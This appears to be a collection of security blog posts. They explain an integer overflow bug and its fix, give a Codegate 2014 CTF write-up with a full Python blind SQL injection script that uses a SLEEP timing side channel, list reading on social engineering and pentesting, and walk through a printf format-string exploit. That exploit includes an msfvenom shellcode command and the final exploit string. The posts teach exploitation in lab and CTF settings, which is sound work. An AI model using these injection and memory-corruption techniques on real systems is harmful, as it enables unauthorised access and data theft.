Integer Overflow Vulnerabilities

What’s wrong with this code (other than the fact the messages are discarded)?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!c
void read_messages(int fd, int num_msgs) {
  char buf[1024];
  size_t msg_len, bytes_read = 0;

  while(num_msgs--) {
    read(fd, &msg_len, sizeof(size_t));
    if (bytes_read + msg_len > sizeof(buf)) {
      printf("Buffer overflow prevented!\n");
      return;
    }
    bytes_read += read(fd, buf+bytes_read, msg_len);
  }
}

If you answered “nothing”, you’d be missing a significant security issue. In fact, this function contains a trivial buffer overflow. By supplying a length 0 < len_a < 1024 for the first message, then a length INT_MAX-len_a ≤ len_b < UINT_MAX, the value bytes_read + msg_len wraps around past UINT_MAX and is less than sizeof(buf). Then the read proceeds with its very large value, but can only read as much data as is available on the file descriptor (probably a socket, if this is a remote exploit). So by supplying enough data on the socket, the buffer will be overflowed, allowing to overwrite the saved EIP.

One way to fix this vulnerability is to move the bytes_read on the other side of the comparison.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!c
void read_messages(int fd, int num_msgs) {
  char buf[1024];
  size_t msg_len, bytes_read = 0;

  while(num_msgs--) {
    read(fd, &msg_len, sizeof(size_t));
    if (msg_len > sizeof(buf) - bytes_read) {
      printf("Buffer overflow prevented!\n");
      return;
    }
    bytes_read += read(fd, buf+bytes_read, msg_len);
  }
}

Since 0 ≤ bytes_read ≤ sizeof(buf) the right side will not underflow, and msg_len will obviously always be within the range of a size_t. In this case, we should not be vulnerable to a buffer overflow.

####Other Reading


Codegate 2014 Quals: 120

From Codegate 2014 quals comes “120”. Provided is a web interface with a single text box and a link to the source, reproduced below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
#!php
<?php
session_start();

$link = @mysql_connect('localhost', '', '');
@mysql_select_db('', $link);

function RandomString()
{
  $filename = "smash.txt";
  $f = fopen($filename, "r");
  $len = filesize($filename);
  $contents = fread($f, $len);
  $randstring = '';
  while( strlen($randstring)<30 ){
    $t = $contents[rand(0, $len-1)];
    if(ctype_lower($t)){
    $randstring .= $t;
    }
  }
  return $randstring;
}

$max_times = 120;

if ($_SESSION['cnt'] > $max_times){
  unset($_SESSION['cnt']);
}

if ( !isset($_SESSION['cnt'])){
  $_SESSION['cnt']=0;
  $_SESSION['password']=RandomString();

  $query = "delete from rms_120_pw where ip='$_SERVER[REMOTE_ADDR]'";
  @mysql_query($query);

  $query = "insert into rms_120_pw values('$_SERVER[REMOTE_ADDR]', ".
      "'$_SESSION[password]')";
  @mysql_query($query);
}
$left_count = $max_times-$_SESSION['cnt'];
$_SESSION['cnt']++;

if ( $_POST['password'] ){
  
  if (eregi("replace|load|information|union|select|from|where|" .
    "limit|offset|order|by|ip|\.|#|-|/|\*",$_POST['password'])){
    @mysql_close($link);
    exit("Wrong access");
  }

  $query = "select * from rms_120_pw where ".
    "(ip='$_SERVER[REMOTE_ADDR]') and " .
    "(password='$_POST[password]')";
  $q = @mysql_query($query);
  $res = @mysql_fetch_array($q);
  if($res['ip']==$_SERVER['REMOTE_ADDR']){
    @mysql_close($link);
    exit("True");
  }
  else{
    @mysql_close($link);
    exit("False");
  }
}

@mysql_close($link);
?>

<head>
<link rel="stylesheet" type="text/css" href="black.css">
</head>

<form method=post action=index.php>
  <h1> <?= $left_count ?> times left </h1>
  <div class="inset">
  <p>
    <label for="password">PASSWORD</label>
    <input type="password" name="password" id="password" >
  </p>
  </div>
  <p class="p-container">
    <span onclick=location.href="auth.php"> Auth </span>
    <input type="submit" value="Check">
  </p>
</form>

The TL;DR of this code is that it uses your PHP session to store a 30 character lowercase letter token, and a counter of how many tries you’ve made against it. You’re given 120 total tries, then a new code will be generated, meaning any data you’ve been able to glean is useless. For what it’s worth, not all letters are equally likely – the source of the data is Aleph One’s “Smashing the Stack for Fun and Profit.” The code contains a blacklist to protect against certain types of SQL injection, but certainly doesn’t cover all SQL injection possibilities.

So let’s do some math. Clearly, trying all possible passwords is out of the question at 2630 possibilities. With the SQL injection, we could try each character separately, using SUBSTR, but that still leaves us with 26*30 (780) possibilities, well more than the 120 we have to work with. What about probabalistically trying the letters in the order of their frequency in the source document. It turns out the letter distribution still requires ~8 tries per letter, meaning we can only get ~13 letters in our 120 tries, or would need 240 tries for the whole passphrase.

Let’s consider that our character set is all lower case letters – how much possible entropy is there? Well, only the lowest 5 bits vary among lower case ASCII letters. So, if we do a bitwise test, we only need 5*30 = 150 tests, but 150 is still too many. If only we could test 2 bits at a time, then we’d only need (ideally) 75 tries. How can we do that when the only signal we get back is a True/False value? Well, we must consider side channels – such as timing. Merely measuring the timing of 2 bit comparisons is not significant enough to cover for network/server variance, but if we could conditionally introduce additional latency, we could use that as a signal. Fortunately, SQL offers us a sleep() function that we can use to introduce this latency and help us take measurements, but how to introduce it conditionally?

Note that the sleep() function returns a false-equivalent value when it completes. Consider the statement ((A AND SLEEP(3)) OR B). This is the truth table for the statement:

ABTimeOutput
FF<3 sF
TF>3 sF
FT<3 sT
TT>3 sT

As can be seen, the value of A controls the timing, and the value of B controls the output. To read a single bit, we can use a construct like ASCII(SUBSTR(password, N, 1)) & 1 << p. This checks if the p-th bit in the N-th byte is set. Collectively, this gives us the ability to read 2 bits with a single request. To break up the bits we need to read, it’s most straightforward to read 1 bit by itself, then 2 pairs of 2 bits from each character. Though suboptimal, it makes implementation straightforward, and still only requires 3 requests per byte, or 90 requests total.

Putting it all together, we get the following code.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#!python
import urllib
import urllib2
import cookielib
import sys
import time

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

cookies_printed = False

def inject(pw):
  global cookies_printed
  data = urllib.urlencode({'password': pw})
  req = opener.open(
      'http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/'
      'index.php', data)
  if not cookies_printed:
    for c in cj:
      print c
    cookies_printed = True
  return req.read().strip() == 'True'

def stdinject(cond):
  return inject("' OR %s OR 'x'='" % cond)

def indexmatch(pos, val):
  # Convert 0-indexed to 1-indexed
  substr = 'SUBSTRING(password, %d, 1)' % (pos+1)
  return stdinject(substr + ("='%s'" % val))

def twobitchar(pos):
  bits = [0]*5
  substr = 'SUBSTRING(password, %d, 1)' % (pos+1)
  # test top most bit
  if stdinject('ASCII(%s) & %d' % (substr, 1 << 4)):
    bits[4] = 1

  def twobittest(lower):
    # (bit(1) and sleep(3)) or bit(2)
    # time indicate bit(1)
    # truth indicates bit(2)
    sleep_time = 3
    start_time = time.time()
    ascii_str = 'ASCII(%s)' % substr
    if stdinject('((%s & %d AND SLEEP(%d)) OR %s & %d)' % (
      ascii_str, 1 << (lower+1), sleep_time, ascii_str, 1 << lower)):
      bits[lower] = 1
    stop_time = time.time()
    if (stop_time - start_time) > sleep_time:
      bits[lower+1] = 1

  # test next 2 bits
  twobittest(2)
  # test last 2 bits
  twobittest(0)

  # reassemble bits
  return chr(int('0b11' + ''.join('%d' % b for b in reversed(bits)),2))

def runtwobit():
  passwd = ''
  for c in xrange(30):
    passwd += twobitchar(c)
    print '[%d] %s' % (c, passwd[-1])
  if inject(passwd):
    print passwd
  else:
    print 'Validation failed!'

runtwobit()

Note the need for special treatment for the HTTP requests – since PHP sessions are in use, we need to provide a CookieJar and output the cookie value so we can use both the session and the password to exchange for our flag and get our points.


Weekly Reading List for 2/15/14

I’ve been thinking a lot about social engineering lately, so I’m going to highlight some of my favorite social engineering resources.

Social Engineering: The Art of Human Hacking

Chris Hadnagy’s book, Social Engineering: The Art of Human Hacking is the authoritative guide on social engineering techniques and counter-measures. Chris describes many of the techniques and approaches used by social engineers, ranging from basic pretexting to full-on neuro-linguistic programming. You can’t protect against what you can’t recognize, so being able to identify the techniques of social engineering is the first step to protecting yourself and your organization.

The Art of Social Engineering?

Kevin Mitnick is widely regarded as one of the world’s best social engineers. He’s published a number of books that describe stories of hacks and social engineering, both his and those he’s worked with. There’s The Art of Deception and The Art of Intrusion which describe a variety of different hacks using different techniques ranging from entirely social engineering-based to entirely technical. More personal is Ghost in the Wires which describes Mitnick’s own exploits when he was considered the nation’s most wanted hacker.

And a little fiction….

Over the past couple of weeks, I’ve read the “Geek Mafia” series by Rick Dakan. While this is a fictional series, it deals a lot with hacking & social engineering, and is remarkable technically accurate. I was impressed with the overall quality and with the technical content. There’s 3 books in the series: Geek Mafia, Geek Mafia: Mile Zero, and Geek Mafia: Black Hat Blues.


printf Format String Exploitation

The format string in a printf statement is responsible for significant flow control within the program, and, if attacker-controlled, can be used to exploit the application in various ways. Specifically, an attacker can read and write arbitrary memory.

Reading memory can be accomplished through the usual operators, and the GNU extension of %<x>$ allows you to jump through the stack to arbitrary positions (as a multiple of the addressing size, anyway). The %n format specifier allows to write to a memory address: the address at that point on the stack is taken as an int *, and the number of bytes output so far will be written to the address. So this allows us to write a value by outputting the number of bytes for the value we want to write.

I’ll discuss exploitation with a simple example, as you might see in a wargame.

Basic steps:

  1. Figure out where your buffer is on the stack.
  2. Figure out where you want to write.
  3. Figure out what you want to write.
  4. Put the exploit together.

Here’s what we’ll use for our sample vulnerable program. For this simple case, I’ve marked the stack executable and am using a system with ASLR disabled.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 1024

int main(int argc, char **argv) {
    char buf[BUF_SIZE];
    if(argc < 2) return 1;

    strncpy(buf, argv[1], BUF_SIZE-1);
    printf(buf);

    return 0;
}

Let’s figure out where our buffer is on the stack, relative to the stack of the printf call. It’s easy enough to do: supply something like AAAA%<x>$p where <x> is a position on the stack, starting from 1 and going up. When you see ‘AAAA0x41414141’ as your output, you’ve found your format string. In this case, the format string is 6 words up the stack.

So, since we can write to memory, where do we want to write? We need something that will be executed after the printf, which severely limits our options. The first option that comes to mind is to overwrite the saved EIP, but most likely we don’t know the exact address where that’s saved, and the stack can shift around quite easily (due to argument lengths, environment variables, etc.). What about something more fixed?

Linux ELF binaries contain a section known as .fini_array, which is defined as “an array of function pointers that contributes to a single termination array for the executable or shared object containing the section.” In a simple binary like this, this section contains only a single function pointer, but that’s ok, because we can overwrite this pointer to point to our shellcode. Since the binary exits almost immediately after calling printf, there’s no problem in waiting for the .fini_array pointers to be called. With objdump -h, we can see the section headers, and find our section:

1
2
3
$ objdump -h printf
 19 .fini_array   00000004  080495b0  080495b0  000005b0  2**2
                  CONTENTS, ALLOC, LOAD, DATA

As expected, it’s 4 bytes long, and located at 0x080495b0, so now we have our address to overwrite.

So what do we want to write there? Clearly the address of our shellcode. We could write our shellcode to the printf buffer, but we’d need to get that address just right, or perhaps include a large nopsled. My favorite trick is to store the shellcode in an environment variable. It’s easy to predict the address (if you don’t change the environment) by writing a small program to spit it out, and, if you don’t feel like writing your own shellcode, msfvenom will provide you with a convenient shellcode in bash form: msfvenom -p linux/x86/exec CMD=/bin/sh -f bash -b '\x00'.

So, stick your shellcode into an environment variable and get its address. So long as the environment doesn’t change, that address will remain constant for all programs invoked from that shell. In my case, I got 0xffffdef2. Because the value is sufficiently large, I’ll actually split it into two 16 bit writes, but the %n operator always writes an int at a time (32 bits), so we have to do it carefully to avoid overwriting ourselves!

Writing from lower to higher works (we’re on a little-endian system, remember!) so we write 0xdef2 to the lower address, then 0xffff to the higher address. Let’s start constructing our format string. First, we’ll need both the lowest address and the one two bytes past it, then output our first value minus 8 bytes, write it to memory, then repeat for the 2nd.

The general format at this point is: <destination address><destination address + 2>%<0xdef2 - 8>c%6$n%<0xffff-0xdef2>c%7$n

Putting it together:
./printf $'\xb0\x95\x04\x08\xb2\x95\x04\x08%57066c%6$n%8461c%7$n' sh$


Weekly Reading List for 2/8/14

Android Pentesting Guides

I’ve been reading a lot about Android pentesting this week, so rather than summarizing each one, here’s a list of useful reading for Android pentesting.

Useful Lab Settings

Maybe you want to test something with an executable stack, ASLR off, or otherwise disable some security feature? This article describes settings for NX, ASLR, and SSP on Linux boxes. More details here.

OWASP Security Testing Guide

I can’t believe I didn’t know about OWASP’s security testing guide before. Though it was published a few years ago, it’s pretty much still relevant, and they’re working on a v4.0.